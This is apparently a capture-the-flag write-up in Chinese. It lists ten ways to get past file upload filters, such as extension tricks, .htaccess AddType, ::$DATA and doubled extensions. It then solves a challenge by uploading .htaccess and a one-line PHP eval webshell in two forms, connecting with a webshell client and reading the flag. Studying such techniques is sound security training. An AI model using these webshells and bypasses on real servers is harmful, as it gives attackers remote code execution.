文件上传漏洞,总结了一下
1、前端绕过,抓包修改后缀名,
2、文件内容绕过,用图片马,抓包修改后缀绕过
3、黑名单绕过,那么我们可以改成phtml抓包绕过
4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”
5、大小写绕过,抓包后修改后缀为.PHp
6、空格绕过,抓包修改后缀,在后缀后面加上空格
7、点绕过,抓包修改后缀,在后缀后面加上点
8.什么删掉我的空格或者.,那我抓包修改为. .或者 . |
9、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,
10、双拼绕过,抓包修改后缀,并在把后缀改成phphpp,这样后端去掉php,还剩下个ph和p组合
成为php
这题用第四种方法就可以绕过啦
这里小小吐槽一下,正常的图片都不能上传,可能是因为文件大小太大了
开始做题:
抓包修改一下,上传.htaccess文件
上传成功
接着就上传后缀为.jpg的木马就好,建议不要图片马,好像文件太大不让传,直接把一句话木马的后缀改成.jpg(内容是<?php eval($_REQUEST[8])?>)
发现被过滤了,于是就换一种写法,换成:
<script language="php">eval($_REQUEST[8]);</script>
再试一下
成功!不用修改后缀了,因为.jpg已经被我们修改为当作php文件解析了
上菜刀连接:
成功getshell,flag在根目录里面
flag{687a8733-c19f-42ad-8d88-4c57b3521989}